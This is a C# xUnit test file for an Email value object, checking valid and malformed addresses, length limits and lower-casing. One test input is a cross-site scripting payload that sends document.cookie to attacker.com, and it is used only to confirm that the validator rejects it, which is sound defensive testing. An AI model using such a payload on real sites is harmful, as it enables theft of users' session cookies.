using Xunit;
using src.Domain.ValueObjects;

// GENERATED BY AI FOR EDUCATION PURPOSE
public class EmailTests
{
    [Fact]
    public void Create_ValidEmail_ReturnsSuccess()
    {
        var result = Email.Create("user@mail.com");
        Assert.True(result.IsSuccess);
        Assert.Equal("user@mail.com", result?.Value?.Value);
    }

    [Theory]
    [InlineData("user.com")]
    [InlineData("user@mail")]
    [InlineData("user@.com")]
    [InlineData("user@com.")]
    [InlineData("<script>document.location='http://attacker.com/steal?cookie='+document.cookie;</script>")]
    public void Create_InvalidFormat_ReturnsFailure(string invalidEmail)
    {
        var result = Email.Create(invalidEmail);
        Assert.True(result.IsFailure);
    }

    [Fact]
    public void Create_TooShort_ReturnsFailure()
    {
        var result = Email.Create("a@b.c");
        Assert.True(result.IsFailure);
    }

    [Fact]
    public void Create_TooLong_ReturnsFailure()
    {
        var longEmail = new string('a', 95) + "@mail.com";
        var result = Email.Create(longEmail);
        Assert.True(result.IsFailure);
    }

    [Fact]
    public void Create_UpperCaseEmail_ReturnsLowerCase()
    {
        var result = Email.Create("USER@MAIL.COM");
        Assert.True(result.IsSuccess);
        Assert.Equal("user@mail.com", result?.Value?.Value);
    }
}